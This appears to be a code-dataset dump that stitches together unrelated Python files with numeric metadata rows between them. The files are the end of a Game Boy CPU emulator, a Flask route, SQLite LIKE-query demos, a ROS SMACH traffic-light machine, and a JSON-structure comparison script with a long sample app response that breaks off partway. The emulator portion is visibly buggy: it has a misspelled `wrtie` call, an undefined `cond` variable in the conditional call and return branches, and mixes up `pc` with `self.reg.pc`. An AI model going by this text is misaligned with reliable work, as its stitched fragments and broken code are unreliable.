elif(self.r == 0b001):
tmp = tmp & 0b11111101
elif(self.r == 0b010):
tmp = tmp & 0b11111011
elif(self.r == 0b011):
tmp = tmp & 0b11110111
elif(self.r == 0b100):
tmp = tmp & 0b11101111
elif(self.r == 0b101):
tmp = tmp & 0b11011111
elif(self.r == 0b110):
tmp = tmp & 0b10111111
elif(self.r == 0b111):
tmp = tmp & 0b01111111
self.mem.write(memaddr, tmp)
#jump instructions
elif(self.opcode == 3 and self.r == 0b000 and self.rp == 0b011): #PC <- nn
self.fetch()
self.decode()
addr = self.n
self.fetch()
self.decode()
addr = (self.n << 8) | addr
self.reg.pc = addr
elif(self.opcode == 3 and self.r < 4 and self.rp == 0b010): #conditional jump
cond = self.r
self.fetch()
self.decode()
addr = self.n
self.fetch()
self.decode()
addr = (self.n << 8) | addr
if(cond == 0b000 and self.reg.z == 0):
self.reg.pc = addr
elif(cond == 0b001 and self.reg.z == 1):
self.reg.pc = addr
elif(cond == 0b010 and self.reg.cy == 0):
self.reg.pc = addr
elif(cond == 0b011 and self.reg.cy == 1):
self.reg.pc = addr
elif(self.opcode == 0 and self.r == 0b011 and self.rp == 0b000): #relative jump PC <- PC + e
self.fetch()
self.decode()
self.reg.pc = self.reg.pc + self.n + 1 #NOTE: I do not know if I need the one there
elif(self.opcode == 0 and self.r > 3 and self.rp == 0b000): #conditional relative jump
cond = self.r
self.fetch()
self.decode()
if(cond == 0b000 and self.reg.z == 0):
self.reg.pc = self.reg.pc + self.n
elif(cond == 0b001 and self.reg.z == 1):
self.reg.pc = self.reg.pc + self.n
elif(cond == 0b010 and self.reg.cy == 0):
self.reg.pc = self.reg.pc + self.n
elif(cond == 0b011 and self.reg.cy == 1):
self.reg.pc = self.reg.pc + self.n
elif(self.opcode == 3 and self.r == 0b101 and self.rp == 0b001): #jump to mem[HL]
memaddr = self.reg.getPair("hl")
self.reg.pc = self.mem.read(memaddr)
#Call and Return instructions
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b101): #mem[SP - 1, - 2] <- PC, PC <- nn, SP <- SP - 2
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(self.opcode == 3 and self.r < 4 and self.rp == 0b100): #conditional Call
if(cond == 0b000 and self.reg.z == 0):
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(cond == 0b001 and self.reg.z == 1):
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(cond == 0b010 and self.reg.cy == 0):
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(cond == 0b011 and self.reg.cy == 1):
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, (self.pc & 0b1111111100000000) >> 8)
self.mem.write(memaddr - 2, (self.pc & 0b11111111))
self.reg.setReg("sp", memaddr - 2)
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.pc = tmp
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b001): #Return PC <- mem[SP], SP <- SP + 2
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(self.opcode == 3 and self.r == 0b011 and self.rp == 0b001): #Return from Interupt PC <- mem[SP], SP <- SP + 2
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(self.opcode == 3 and self.r < 4 and self.rp == 0b000): #Conditional Return
if(cond == 0b000 and self.reg.z == 0):
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(cond == 0b001 and self.reg.z == 1):
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(cond == 0b010 and self.reg.cy == 0):
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(cond == 0b011 and self.reg.cy == 1):
memaddr = self.reg.getReg("sp")
tmpPC = self.mem.read(memaddr)
tmpPC = tmpPC | (self.mem.read(memaddr + 1) << 8)
self.reg.pc = tmpPC
self.reg.setReg("sp", memaddr + 2)
elif(self.opcode == 3 and self.rp == 0b111): #RST
memaddr = self.reg.getReg("sp")
self.mem.write(memaddr - 1, self.pc >> 8)
self.mem.wrtie(memaddr - 2, self.pc & 0b11111111)
self.reg.setReg("sp", memaddr - 2)
if(self.r == 0b000):
self.reg.pc = 0x00
elif(self.r == 0b001):
self.reg.pc = 0x08
elif(self.r == 0b010):
self.reg.pc = 0x10
elif(self.r == 0b011):
self.reg.pc = 0x18
elif(self.r == 0b100):
self.reg.pc = 0x20
elif(self.r == 0b101):
self.reg.pc = 0x28
elif(self.r == 0b110):
self.reg.pc = 0x30
elif(self.r == 0b111):
self.reg.pc = 0x38
#General Purpose Insructions
elif(self.opcode == 0 and self.r == 0b101 and self.rp == 0b111): #invert
tmp = self.reg.getReg(self.reg.RegA)
self.reg.setReg(self.reg.RegA, ~tmp)
self.reg.setFlag('h', 1)
self.reg.setFlag('n', 1)
elif(self.opcode == 0 and self.r == 0b000 and self.rp == 0b000): #NOP
pass
elif(self.opcode == 1 and self.r == 0b110 and self.rp == 0b110): #Halt
#I think this works...
memaddr = self.reg.getReg('sp')
self.mem.write(memaddr + 1, pc & 0b11111111)
self.mem.write(memaddr + 2, pc >> 8)
return -2
elif(self.opcode == 0 and self.r == 0b010 and self.rp == 0b000): #stop
#reset all the flags
self.fetch()
self.decode()
if(self.n == 0):
return -1
elif(self.opcode == 0 and self.r == 0b100 and self.rp == 0b111): #binary coded decimal adjustment
self.reg.setReg(self.reg.RegA, self.bcd)
self.reg.setFlag('cy', self.bcdcy)
self.reg.setFlag('h', 0)
self.reg.setFlag('z', 1 if self.bcd == 0 else 0)
self.prev = self.inst
print(self.opcode, self.r, self.rp, self.n)
return 0
def BCDCalc(add, n, cy, h, A): #calculate what the BCD Result would be if needed. return A, CY
    """Compute the decimal-adjust (DAA) correction for the accumulator.

    add -- True when the previous operation was an addition
    n   -- N (subtract) flag of the previous operation
    cy  -- carry flag of the previous operation (0 or 1)
    h   -- half-carry flag of the previous operation (0 or 1)
    A   -- accumulator value to adjust

    Returns (adjusted_A, carry_out).  When no table row matches, A and cy
    are returned unchanged.
    """
    # BUGFIX: the original used '==' (comparison) instead of '=' here, so
    # low/high were never bound and every call raised NameError.
    low = A & 0b1111
    high = (A & 0b11110000) >> 4
    if (add and n == 0): #must adjust the A value for addition
        if(cy == 0 and h == 0):
            if(high <= 0x9 and low <= 0x9):
                return A, 0
            elif(high <= 0x8 and low >= 0xA):
                return A + 0x06, 0
            elif(high >= 0xA and low <= 0x9):
                return A + 0x60, 1
            elif(high >= 0x9 and low >= 0xA):
                return A + 0x66, 1
        elif(cy == 0 and h == 1):
            if(high <= 0x9 and low <= 0x3):
                return A + 0x06, 0
            elif(high >= 0xA and low <= 0x03):
                return A + 0x66, 1
        elif(cy == 1 and h == 0):
            if(high < 0x2):
                if(low <= 0x9):
                    return A + 0x06, 1
                else:
                    return A + 0x66, 1
        elif(cy == 1 and h == 1):
            if(high <= 0x03 and low <= 0x03):
                return A + 0x66, 1
    elif(not add and n == 1): #Adjust A for subtraction
        if(cy == 0 and h == 0 and high <= 0x9 and low <= 0x9):
            return A, 0
        elif(cy == 0 and h == 1 and high <= 0x8 and low >= 0x6):
            return A + 0xFA, 0
        elif(cy == 1 and h == 0 and high >= 0x7 and low <= 0x9):
            return A + 0xA, 1
        elif(cy == 1 and h == 1 and high >= 0x6 and low >= 0x6):
            return A + 0x9A, 1
    #No adjustment
    return A, cy
class Memory():
    """Byte-addressable Game Boy memory, addresses 0x0000-0xFFFF inclusive."""
    def __init__(self):
        # BUGFIX: the Game Boy address space is 0x10000 bytes (0x0000-0xFFFF);
        # the original [0] * 0xFFFF array made the top address 0xFFFF (the IE
        # interrupt-enable register) unaddressable.
        self.mem = [0] * 0x10000
    def read(self, address):
        """Return the byte at *address*; raise ValueError when out of range."""
        # Also reject negative addresses, which previously indexed from the end.
        if(address > 0xFFFF or address < 0):
            raise ValueError("Address out of memory")
        else:
            return self.mem[address]
    def write(self, address, value):
        """Store *value* at *address*; raise ValueError when out of range."""
        if(address > 0xFFFF or address < 0):
            raise ValueError("Address out of memory")
        else:
            self.mem[address] = value
| 39.201625
| 187
| 0.452119
| 6,745
| 53,079
| 3.556116
| 0.048332
| 0.144751
| 0.094555
| 0.041899
| 0.832694
| 0.800425
| 0.778954
| 0.762737
| 0.731885
| 0.715501
| 0
| 0.098936
| 0.406639
| 53,079
| 1,353
| 188
| 39.230599
| 0.662645
| 0.056312
| 0
| 0.719388
| 0
| 0
| 0.009733
| 0
| 0
| 0
| 0.004206
| 0.000739
| 0
| 1
| 0.013605
| false
| 0.00085
| 0
| 0.001701
| 0.036565
| 0.00085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9bcb95ff91276777349e2f23e0fb8c375818b6bc
| 138
|
py
|
Python
|
view.py
|
PashaKim/flask_blog_test
|
85b55f412cfb7bdcad364367add20e9c9fdc2f5d
|
[
"MIT"
] | null | null | null |
view.py
|
PashaKim/flask_blog_test
|
85b55f412cfb7bdcad364367add20e9c9fdc2f5d
|
[
"MIT"
] | null | null | null |
view.py
|
PashaKim/flask_blog_test
|
85b55f412cfb7bdcad364367add20e9c9fdc2f5d
|
[
"MIT"
] | null | null | null |
from app import app
from flask import render_template
@app.route('/')
def index():
    """Render the site root: index.html with template variable name='Pavlo'."""
    return render_template('index.html', name='Pavlo')
| 23
| 54
| 0.731884
| 20
| 138
| 4.95
| 0.65
| 0.282828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130435
| 138
| 5
| 55
| 27.6
| 0.825
| 0
| 0
| 0
| 0
| 0
| 0.115942
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
9bdaaf17be3df792361e808379913ed6e3fcccec
| 1,150
|
py
|
Python
|
Databases using SQLite3/Like Clause.py
|
TausifAnsari/PyHub
|
f6c949dc6a3974f57d7d146708443d0ceeb4418f
|
[
"MIT"
] | 1
|
2020-09-30T19:31:20.000Z
|
2020-09-30T19:31:20.000Z
|
Databases using SQLite3/Like Clause.py
|
TanviSutar/PyHub
|
6281e9f515674fb51f0d0862c26ec18020fa7d83
|
[
"MIT"
] | null | null | null |
Databases using SQLite3/Like Clause.py
|
TanviSutar/PyHub
|
6281e9f515674fb51f0d0862c26ec18020fa7d83
|
[
"MIT"
] | null | null | null |
import sqlite3

# Path of the student database queried by every demo below.
DB_PATH = "assets/Student_records.db"


def _print_matching_records(title, pattern):
    """Print *title*, then every NAMES/MARKS row whose NAMES matches *pattern*.

    A fresh connection is opened and closed per call, mirroring the original
    script's behavior.  The LIKE pattern is passed as a bound parameter
    instead of being embedded in the SQL string.
    """
    print(title)
    connection = sqlite3.connect(DB_PATH)
    cursor = connection.cursor()
    cursor.execute(
        "SELECT NAMES,MARKS FROM Student_Records WHERE NAMES LIKE ?",
        (pattern,),
    )
    for names, marks in cursor.fetchall():
        print(names, marks)
    connection.close()


_print_matching_records("PRINTING NAMES STARTING WITH A", "a%")   # names starting with a
_print_matching_records("\nPRINTING NAMES ENDING WITH I", "%i")   # names ending with i
_print_matching_records("\nPRINTING NAMES WITH ID IN THEM", "%id%")  # names containing "id"

input("Press any key to exit ")
| 35.9375
| 109
| 0.755652
| 158
| 1,150
| 5.424051
| 0.253165
| 0.105018
| 0.084014
| 0.105018
| 0.84014
| 0.84014
| 0.84014
| 0.84014
| 0.84014
| 0.84014
| 0
| 0.00398
| 0.126087
| 1,150
| 32
| 110
| 35.9375
| 0.848756
| 0.058261
| 0
| 0.724138
| 0
| 0
| 0.349074
| 0.069444
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.034483
| 0.206897
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
500720a8e98544696ac21ffb3aacc834e0fc40f3
| 3,714
|
py
|
Python
|
smach_minimal/scripts/traffic_lights.py
|
priteshgohil/minimal_ros_packages
|
17606b10ab1ffac7c0c933f6d540b2b015af706f
|
[
"MIT"
] | null | null | null |
smach_minimal/scripts/traffic_lights.py
|
priteshgohil/minimal_ros_packages
|
17606b10ab1ffac7c0c933f6d540b2b015af706f
|
[
"MIT"
] | null | null | null |
smach_minimal/scripts/traffic_lights.py
|
priteshgohil/minimal_ros_packages
|
17606b10ab1ffac7c0c933f6d540b2b015af706f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
"""
#with user input
# define state Red
class Red(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['Wait'], output_keys=['prev_state'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('***Executing state Red***')
rospy.sleep(1)
userdata.prev_state = 'red'
return 'Wait'
# define state Yellow
class Yellow(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['Continue', 'Stop'], input_keys=['prev_state'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('***Executing state Yellow***')
rospy.sleep(1)
if userdata.prev_state == 'green':
return 'Stop'
if userdata.prev_state == 'red':
return 'Continue'
#define state green
class Green(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['Wait'],output_keys=['prev_state'])
self.counter = 0
def execute(self, userdata):
rospy.loginfo('***Executing state Green***')
rospy.sleep(1)
userdata.prev_state = 'green'
return 'Wait'
def main():
rospy.init_node('traffic_lights')
# flag=0
# Create a SMACH state machine
sm = smach.StateMachine(outcomes=['Done'])
# Open the container
with sm:
# Add states to the container
smach.StateMachine.add('RED', Red(),
transitions={'Wait':'YELLOW'})
smach.StateMachine.add('YELLOW', Yellow(),
transitions={'Stop':'RED',
'Continue':'GREEN'})
smach.StateMachine.add('GREEN', Green(),
transitions={'Wait':'YELLOW'})
# Execute SMACH plan
outcome = sm.execute()
if __name__ == '__main__':
main()
"""
# define state Red
class Red(smach.State):
    """RED traffic-light state: outcome 'Stop' three times, then 'Continue'."""
    def __init__(self):
        smach.State.__init__(self, outcomes=['Stop','Continue'])
        self.counter = 0
    def execute(self, userdata):
        rospy.loginfo('***Executing state Red***')
        rospy.sleep(1)
        # Guard clause: after three visits the light releases traffic.
        if self.counter >= 3:
            return 'Continue'
        self.counter += 1
        return 'Stop'
# define state Yellow
class Yellow(smach.State):
    """YELLOW traffic-light state: outcome 'Continue' three times, then 'Stop'."""
    def __init__(self):
        smach.State.__init__(self, outcomes=['Stop', 'Continue'])
        self.counter = 0
    def execute(self, userdata):
        rospy.loginfo('***Executing state Yellow***')
        rospy.sleep(1)
        # Guard clause: after three visits the light turns back to red.
        if self.counter >= 3:
            return 'Stop'
        self.counter += 1
        return 'Continue'
#define state green
class Green(smach.State):
    """GREEN traffic-light state: outcome 'Go' three times, then 'Stop'."""
    def __init__(self):
        smach.State.__init__(self, outcomes=['Go', 'Stop'])
        self.counter = 0
    def execute(self, userdata):
        rospy.loginfo('***Executing state Green***')
        rospy.sleep(1)
        # Guard clause: after three visits the light stops traffic again.
        if self.counter >= 3:
            return 'Stop'
        self.counter += 1
        return 'Go'
def main():
    """Assemble the RED/YELLOW/GREEN SMACH state machine and run it."""
    rospy.init_node('traffic_lights')
    machine = smach.StateMachine(outcomes=['Done'])
    # While the container is open, each add() registers a state plus the
    # mapping from its outcomes to successor states.
    with machine:
        smach.StateMachine.add('RED', Red(),
                               transitions={'Stop':'RED',
                                            'Continue':'YELLOW'})
        smach.StateMachine.add('YELLOW', Yellow(),
                               transitions={'Stop':'RED',
                                            'Continue':'GREEN'})
        smach.StateMachine.add('GREEN', Green(),
                               transitions={'Stop':'YELLOW',
                                            'Go':'GREEN'})
    # Run the plan; the overall outcome is returned when the machine finishes.
    outcome = machine.execute()

if __name__ == '__main__':
    main()
| 25.094595
| 92
| 0.582391
| 418
| 3,714
| 4.985646
| 0.148325
| 0.067179
| 0.037428
| 0.048944
| 0.882438
| 0.846929
| 0.830614
| 0.830614
| 0.785509
| 0.785509
| 0
| 0.007402
| 0.272483
| 3,714
| 147
| 93
| 25.265306
| 0.763879
| 0.05412
| 0
| 0.535714
| 0
| 0
| 0.138614
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.071429
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
500832c01a4b872cb5f8446810ebcbeda109758d
| 88,229
|
py
|
Python
|
backend/test.py
|
wuchaofan1654/tester
|
ff38d42e06cbdfa04882e8e95ada2dd93e6609f2
|
[
"MIT"
] | null | null | null |
backend/test.py
|
wuchaofan1654/tester
|
ff38d42e06cbdfa04882e8e95ada2dd93e6609f2
|
[
"MIT"
] | null | null | null |
backend/test.py
|
wuchaofan1654/tester
|
ff38d42e06cbdfa04882e8e95ada2dd93e6609f2
|
[
"MIT"
] | null | null | null |
# _*_ coding=utf-8 _*_
"""
@version: python3.6.4
@auth: created by sandy
@time: 2018/9/10 14:04
@software: PyCharm
@desc: // 比对json数据结构
"""
def compare_json_construction(dict1, dict2):
    """Recursively check that dict2 mirrors dict1's key/type structure.

    Every key of dict1 must exist in dict2 with a value of the same type;
    list values are compared through their first element only; nested dicts
    are compared recursively.  Returns True on match, False otherwise.
    Raises AssertionError when either argument is not a dict or a shared
    key's value types differ.
    """
    # both arguments must be dict-shaped
    assert isinstance(dict1, dict)
    assert isinstance(dict2, dict)
    # walk dict1's keys and verify each one exists in dict2
    for k, v in dict1.items():
        # missing key: structures differ
        if k not in dict2.keys():
            return False
        print(k)
        assert type(v) == type(dict2.get(k))
        _v = dict2[k]
        # list values: only the first element is structurally compared
        if v and isinstance(v, list):
            v = v[0]
            if _v and isinstance(_v, list):
                _v = dict2[k][0]
            else:
                return False
        # dict values: recurse.  BUGFIX: the original discarded the
        # recursive result, so nested mismatches were silently ignored.
        if isinstance(v, dict):
            if not compare_json_construction(v, _v):
                return False
    return True
d1 = {
"errorCode": "0",
"errorMsg": "success",
"responseData": {
"has_more": 1,
"share_info": {
"share_post_video_yn": 1,
"share_post_video_img": "http:\/\/img2.soyoung.com\/message\/ios\/20180823\/6\/dfdb99aa103ddcaf40c1826030ace91e_600_300.jpg",
"share_image": "http:\/\/img2.soyoung.com\/message\/ios\/20180823\/6\/dfdb99aa103ddcaf40c1826030ace91e.jpg",
"share_url": "https:\/\/m.sy.soyoung.com\/post\/question?question_id=1",
"share_title": "1.开眼角达人,就喜欢做双眼皮。馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢\",\"share_desc\":\"馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好",
"share_desc": ">>>><<<<馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢",
"share_pictorial_title": "精选问题",
"share_pictorial_user_name": "匿名用户",
"share_pictorial_user_avatar": "http:\/\/img2.soyoung.com\/anonymous.png",
"share_pictorial_post_video_yn": 1,
"share_pictorial_image": [
"http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e_301_301.jpg"
],
"share_pictorial_content": "1.开眼角达人,就喜欢做双眼皮。馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢\",\"share_desc\":\"馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好"
},
"question_info": {
"cover_img": {},
"create_date": "2018-08-22 09:13:35",
"answer_cnt": "30",
"create_date_str": "发布于8月22日",
"images": [
{
"u": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e_301_301.jpg",
"w": "1242",
"h": "1242",
"o": "1",
"u_y": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e.jpg"
},
{
"u": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e_301_301.jpg",
"w": "1242",
"h": "1242",
"o": "2",
"u_y": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e.jpg"
},
{
"u": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e_301_301.jpg",
"w": "1242",
"h": "1242",
"o": "3",
"u_y": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e.jpg"
}
],
"question_content": "1.开眼角达人,就喜欢做双眼皮。馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好呢\",\"share_desc\":\"馥郁芬芳过改革他通过改革我刚刚下载了有关各方太颓废风格改革改革法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈据说是说几句救济哦呢绝交就[:9][:9][:9]开业开业那得才好????????????哪里啊线雕好还是超声刀好",
"question_id": "1",
"post_id": "18520832",
"menu_ids": [
"10003"
],
"video": {
"duration": "00.07",
"url": "http:\/\/videosy.soyoung.com\/79f1a0130efe482d3499ca0add3e3c6d.mp4"
},
"video_cover": {
"u": "http:\/\/img2.soyoung.com\/message\/ios\/20180815\/2\/781e75b347db96147a3f0310dfc24b6e_301_301.jpg",
"w": "1242",
"h": "1242"
},
"video_gif": {
"u": "http:\/\/videosy.soyoung.com\/Kvt6Y_301_301",
"w": 344,
"h": 608
},
"user": {
"uid": 0,
"user_name": "匿名用户",
"certified_type": "",
"certified_id": "",
"level": "",
"daren_level": "",
"daren_level_text": "",
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img2.soyoung.com\/anonymous.png"
},
"really_uid": "20529727"
},
"question_permissions": 0,
"is_answer_already": 0,
"is_adopt": 0
},
"list": [
{
"adopt_yn": 1,
"comment_cnt": "25",
"create_date": "2018-04-07 16:59:16",
"create_date_str": "4月7日",
"up_cnt": "4",
"content": " >>>><<<<馥郁芬芳过改革他通过改革我\r\n 刚刚下载了有关各方太颓废风格改革改革\r\n 法国哈哈哈哈歌了??哈哈哈哈哈海昊傻哈哈\r\n 据说是说几句\r\n 救济哦呢绝交就<img class=\"img_motion\" src='http:\/\/static.soyoung.com\/\/images\/newface\/face9.png' \/><img class=\"img_motion\" src='http:\/\/static.soyoung.com\/\/images\/newface\/face9.png' \/><img class=\"img_motion\" src='http:\/\/static.soyoung.com\/\/images\/newface\/face9.png' \/>开业开业那得才好???????????? 哪里啊\r\n 线雕好还是超声刀好呢 ",
"post_id": "18520832",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {
"duration": "00:04",
"url": "http:\/\/videosy.soyoung.com\/162d79e59318b135b62204453ff6d7c7.mp4"
},
"video_cover": {
"u": "http:\/\/img2.soyoung.com\/message\/ios\/20180823\/6\/dfdb99aa103ddcaf40c1826030ace91e.jpg",
"w": "",
"h": ""
},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 17:23:31",
"create_date_str": "8月30日",
"up_cnt": "1",
"content": "发个姐姐",
"post_id": "18549048",
"images": [],
"is_favor": 0,
"user": {
"uid": "3547629",
"user_name": "测试医生12",
"certified_type": "3",
"certified_id": "38376",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img2.soyoung.com\/doctor\/20180510\/4\/20180510155118825_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-31 17:41:16",
"create_date_str": "8月31日",
"up_cnt": "0",
"content": "Ghgghhggghhvh5677373);$;!,””>>##%^*’-:;👀",
"post_id": "18549098",
"images": [],
"is_favor": 0,
"user": {
"uid": "20530319",
"user_name": "w氧气7546761528376776",
"certified_type": "0",
"certified_id": "0",
"level": "7",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img2.soyoung.com\/upload\/20180724\/8\/dfea7a3c724a1bb74939fedf1a3ebce9_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 20:03:04",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": ":yp0 ook",
"post_id": "18549064",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 15:13:03",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "哦民工",
"post_id": "18549035",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
"certified_type": "10",
"certified_id": "0",
"level": "13",
"daren_level": False,
"daren_level_text": False,
"avatar": {
"ident": "lnimage",
"zoom": "89%",
"w": 57,
"h": 57,
"u": "http:\/\/img1.soyoung.com\/avatar2_100_100_64_64.jpg"
}
},
"video": {},
"video_cover": {},
"video_gif": {}
},
{
"adopt_yn": 0,
"comment_cnt": "0",
"create_date": "2018-08-30 14:30:38",
"create_date_str": "8月30日",
"up_cnt": "0",
"content": "不能这样子搞吧",
"post_id": "18549026",
"images": [],
"is_favor": 0,
"user": {
"uid": "20529724",
"user_name": "氧气5309361531468554",
